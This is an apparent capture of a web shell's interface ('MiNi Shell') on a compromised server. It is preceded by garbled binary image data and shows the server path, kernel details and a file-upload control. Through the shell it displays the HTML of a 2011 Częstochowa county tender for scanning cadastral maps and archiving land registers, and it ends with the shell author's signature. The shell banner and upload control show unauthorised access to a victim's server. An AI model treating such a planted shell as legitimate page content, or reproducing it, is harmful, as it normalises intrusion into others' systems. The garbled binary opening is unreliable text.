JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111125/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111125/397684-N-2011.html

<p class="kh_header"><b>Częstochowa: Archiwizacja elementów zasobu PODGiK - 2 zadania</b><br>
<b>Numer ogłoszenia: 397684 - 2011; data zamieszczenia: 25.11.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Starostwo Powiatowe w Częstochowie , ul. Jana III Sobieskiego 9, 42-200 Częstochowa, woj. śląskie, tel. 034 3229100, 3229126, faks 034 3229111.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat-czestochowski.4bip.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Archiwizacja elementów zasobu PODGiK - 2 zadania.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie 1
Zadanie polega na wykonaniu skanowania i kalibracji map ewidencyjnych dla gmin Blachownia, Mstów i Starcza zgodnie z niżej wymienionymi wytycznymi technicznymi.

WYTYCZNE TECHNICZNE:
1.Zakres opracowania i ilość jednostek: 
-Łącznie 233 matryce i 229 pierworysów z terenu gmin Blachownia (terem miejski i wiejski), Mstów i Starcza

2.Cel opracowania
-archiwizacja analogowych map ewidencyjnych wycofanych z bieżącej aktualizacji i podpięcie ich do systemu Ewmapa jako materiału historycznego, pomocnego w przypadku wyjaśniania rozbieżności.

3.Zakres i technologia prac:
1)Skanowanie
a.rozdzielczość skanowania minimum 300 DPI
b.pierworysy należy zeskanować w kolorze, matryce mono
c.pliki należy zapisać w formacie tiff.
2)Przygotowanie rastrów do kalibracji.
a.zeskanowane obrazy należy dociąć usuwając zbędne obszary poza rysunkiem mapy i opisem.
b.obrazy należy poddać wstępnej obróbce
-kolorowe muszą być czytelne i kontrastowe
-mono należy pozbawić zabrudzeń, szumu pikselowego i uczytelnić aby cała treść mapy była widoczna i czytelna
3)Kalibracja
a.rastry należy przetworzyć do formatu EVR i odpowiednio opisać
b.pliki należy zapisać pod nazwą wg szablonu: kod m/p, nr teryt gminy (bez części 2404), nazwa obrębu, (wyniesienie), np. m162_Własna, p162_Klepaczka, p162_Łysiec_w1
c.wpasowanie należy wykonać w programie Ewmapa metodą afiniczną przy wykorzystaniu minimum 20 punktów na jeden arkusz mapy równomiernie rozmieszczonych na całym arkuszu
d.średni błąd transformacji nie może przekraczać 0.4 mm w skali mapy.
e.przy wyborze punktów dostosowania należy przyjąć następującą kolejność
-punkty osnowy pokazane na mapie
-wyraźne punkty przecięcia granic
f.tzw. wyniesienia należy skalibrować do osobnego pliku i zapisać pod nazwą mapy głównej z przyrostkiem _w1, _w2 itd.
-w tym przypadku należy obciąć całą pozostałą treść mapy, łącznie z opisem.
-z mapy głównej należy również usunąć treść wyniesienia.

Zadanie 2
Zadanie polega na archiwizacji rejestrów pisanych ewidencji gruntów dla Gminy Blachownia (obszar wiejski) zgodnie z niżej wymienionymi wytycznymi technicznymi.
2.Cel opracowania
-archiwizacja analogowych rejestrów ewidencji gruntów z umożliwieniem wyszukiwania informacji na podstawie nr działki i właściciela.
3.Zakres i technologia prac:
1) Skanowanie
a.rozdzielczość skanowania 400 DPI, kolor
b.skany powinny być odpowiednio zorientowane, aby korzystanie z nich było możliwe bez obracania
c.strony składające się z dwóch kart (dla których treść poszczególnych rubryk przechodzi z jednej karty na drugą) muszą być zeskanowane w całości do jednego pliku
d.w przypadku nieczytelnych skanów, należy je uczytelnić w programie do obróbki obrazów rastrowych
e.pliki należy zapisać w formacie png
f.UWAGA: Część rejestrów (głownie tych w formacie A-3) w celu poprawnego i czytelnego zeskanowania będzie wymagała rozszycia i po zeskanowaniu doprowadzenia do stanu nie gorszego niż przed skanowaniem.
2  Pliki należy umieścić w zdefiniowanej strukturze katalogów:
a.katalog główny o nazwie gminy
b.wewnątrz podkatalogi o nazwie obrębu
c.wewnątrz podkatalogi o nazwie zgodne z nr tomu
d.nazwy plików muszą być zgodne z numerem strony w rejestrze
3)  Rejestry po zeskanowaniu nie mogą być w gorszym stanie technicznym niż przed skanowaniem. W razie konieczności należy wymienić, wzmocnić okładki opisując na nich  informacje zgodnie z dotychczasowy opisem.
4) Baza obiektów.
a.Wykonawca dla zeskanowanych rejestrów utworzy bazę danych zawierającą następujące obiekty:
-działki wraz z kartami mapy (łącznie z działkami wykreślonymi)
-właścicieli (łącznie z wykreślonymi)
-pozycji rejestrowych (łącznie z wykreślonymi)
-strony rejestru z opisaniem nr tomu, nazwy gminy i obrębu. 
-dwukierunkowe relacje: działki - strony, działki - pozycja, właściciele - strony, właściciele - pozycja, pozycja - strony
Baza musi być założona oddzielnie dla każdego obrębu. Baza musi być w formacie Access-a.
b.Wykonawca sporządzi w formie operatu posortowane wykazy na podstawie danych zawartych w stworzonej bazie.
-działek z informacją o obrębie, pozycji, tomie, karcie mapy, nr strony
-właścicieli z informacją obrębie, pozycji, tomie, karcie mapy, nr strony
-pozycji z informacją o obrębie, tomie, numerach stron stanowiących pozycję.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.13.10.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 21.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> brak</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy posiadają wiedzę 
i doświadczenie tj.wykonali minimum jedną usługi o podobnym charakterze i odpowiadającej swoim rodzajem usłudze stanowiącej przedmiot zamówienia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>C. Dodatkowo do oferty należy dołączyć:
1) Aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust.  1 pkt 2 ustawy Prawo zamówień publicznych, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy
2) Zaakceptowany (zaparafowany) projekt umowy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.powiat-czestochowski.4bip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Częstochowie
ul. Jana III Sobieskiego 9
42-217 Częstochowa
e-mail: przetargi@czestochowa.powiat.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.12.2011 godzina 11:30, miejsce: Starostwo Powiatowe w Częstochowie
ul. Jana III Sobieskiego 9
42-217 Częstochowa
pok. 3.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie 1
Zadanie polega na wykonaniu skanowania i kalibracji map ewidencyjnych dla gmin Blachownia, Mstów i Starcza zgodnie z niżej wymienionymi wytycznymi technicznymi..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 1
Zadanie polega na wykonaniu skanowania i kalibracji map ewidencyjnych dla gmin Blachownia, Mstów i Starcza zgodnie z niżej wymienionymi wytycznymi technicznymi.

WYTYCZNE TECHNICZNE:
1.Zakres opracowania i ilość jednostek: 
-Łącznie 233 matryce i 229 pierworysów z terenu gmin Blachownia (terem miejski i wiejski), Mstów i Starcza

2.Cel opracowania
-archiwizacja analogowych map ewidencyjnych wycofanych z bieżącej aktualizacji i podpięcie ich do systemu Ewmapa jako materiału historycznego, pomocnego w przypadku wyjaśniania rozbieżności.

3.Zakres i technologia prac:
1)Skanowanie
a.rozdzielczość skanowania minimum 300 DPI
b.pierworysy należy zeskanować w kolorze, matryce mono
c.pliki należy zapisać w formacie tiff.
2)Przygotowanie rastrów do kalibracji.
a.zeskanowane obrazy należy dociąć usuwając zbędne obszary poza rysunkiem mapy i opisem.
b.obrazy należy poddać wstępnej obróbce
-kolorowe muszą być czytelne i kontrastowe
-mono należy pozbawić zabrudzeń, szumu pikselowego i uczytelnić aby cała treść mapy była widoczna i czytelna
3)Kalibracja
a.rastry należy przetworzyć do formatu EVR i odpowiednio opisać
b.pliki należy zapisać pod nazwą wg szablonu: kod m/p, nr teryt gminy (bez części 2404), nazwa obrębu, (wyniesienie), np. m162_Własna, p162_Klepaczka, p162_Łysiec_w1
c.wpasowanie należy wykonać w programie Ewmapa metodą afiniczną przy wykorzystaniu minimum 20 punktów na jeden arkusz mapy równomiernie rozmieszczonych na całym arkuszu
d.średni błąd transformacji nie może przekraczać 0.4 mm w skali mapy.
e.przy wyborze punktów dostosowania należy przyjąć następującą kolejność
-punkty osnowy pokazane na mapie
-wyraźne punkty przecięcia granic
f.tzw. wyniesienia należy skalibrować do osobnego pliku i zapisać pod nazwą mapy głównej z przyrostkiem _w1, _w2 itd.
-w tym przypadku należy obciąć całą pozostałą treść mapy, łącznie z opisem..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.13.10.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 21.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie 2
Zadanie polega na archiwizacji rejestrów pisanych ewidencji gruntów dla Gminy Blachownia (obszar wiejski) zgodnie z niżej wymienionymi wytycznymi technicznymi..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 2
Zadanie polega na archiwizacji rejestrów pisanych ewidencji gruntów dla Gminy Blachownia (obszar wiejski) zgodnie z niżej wymienionymi wytycznymi technicznymi.
2.Cel opracowania
-archiwizacja analogowych rejestrów ewidencji gruntów z umożliwieniem wyszukiwania informacji na podstawie nr działki i właściciela.

3.Zakres i technologia prac:
1) Skanowanie
a.rozdzielczość skanowania 400 DPI, kolor
b.skany powinny być odpowiednio zorientowane, aby korzystanie z nich było możliwe bez obracania
c.strony składające się z dwóch kart (dla których treść poszczególnych rubryk przechodzi z jednej karty na drugą) muszą być zeskanowane w całości do jednego pliku
d.w przypadku nieczytelnych skanów, należy je uczytelnić w programie do obróbki obrazów rastrowych
e.pliki należy zapisać w formacie png
f.UWAGA: Część rejestrów (głownie tych w formacie A-3) w celu poprawnego i czytelnego zeskanowania będzie wymagała rozszycia i po zeskanowaniu doprowadzenia do stanu nie gorszego niż przed skanowaniem.
2)    Pliki należy umieścić w zdefiniowanej strukturze katalogów:
a.katalog główny o nazwie gminy
b.wewnątrz podkatalogi o nazwie obrębu
c.wewnątrz podkatalogi o nazwie zgodne z nr tomu
d.nazwy plików muszą być zgodne z numerem strony w rejestrze
3)  Rejestry po zeskanowaniu nie mogą być w gorszym stanie technicznym niż przed skanowaniem. W razie konieczności należy wymienić, wzmocnić okładki opisując na nich  informacje zgodnie z dotychczasowy opisem.
e. Baza obiektów.
a.Wykonawca dla zeskanowanych rejestrów utworzy bazę danych zawierającą następujące obiekty:
i.działki wraz z kartami mapy (łącznie z działkami wykreślonymi)
ii.właścicieli (łącznie z wykreślonymi)
iii.pozycji rejestrowych (łącznie z wykreślonymi)
iv.strony rejestru z opisaniem nr tomu, nazwy gminy i obrębu. 
v.dwukierunkowe relacje: działki - strony, działki - pozycja, właściciele - strony, właściciele - pozycja, pozycja - strony
Baza musi być założona oddzielnie dla każdego obrębu. Baza musi być w formacie Access-a.
b.Wykonawca sporządzi w formie operatu posortowane wykazy na podstawie danych zawartych w stworzonej bazie.
i.działek z informacją o obrębie, pozycji, tomie, karcie mapy, nr strony
ii.właścicieli z informacją obrębie, pozycji, tomie, karcie mapy, nr strony
iii.pozycji z informacją o obrębie, tomie, numerach stron stanowiących pozycję.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.13.10.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 21.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com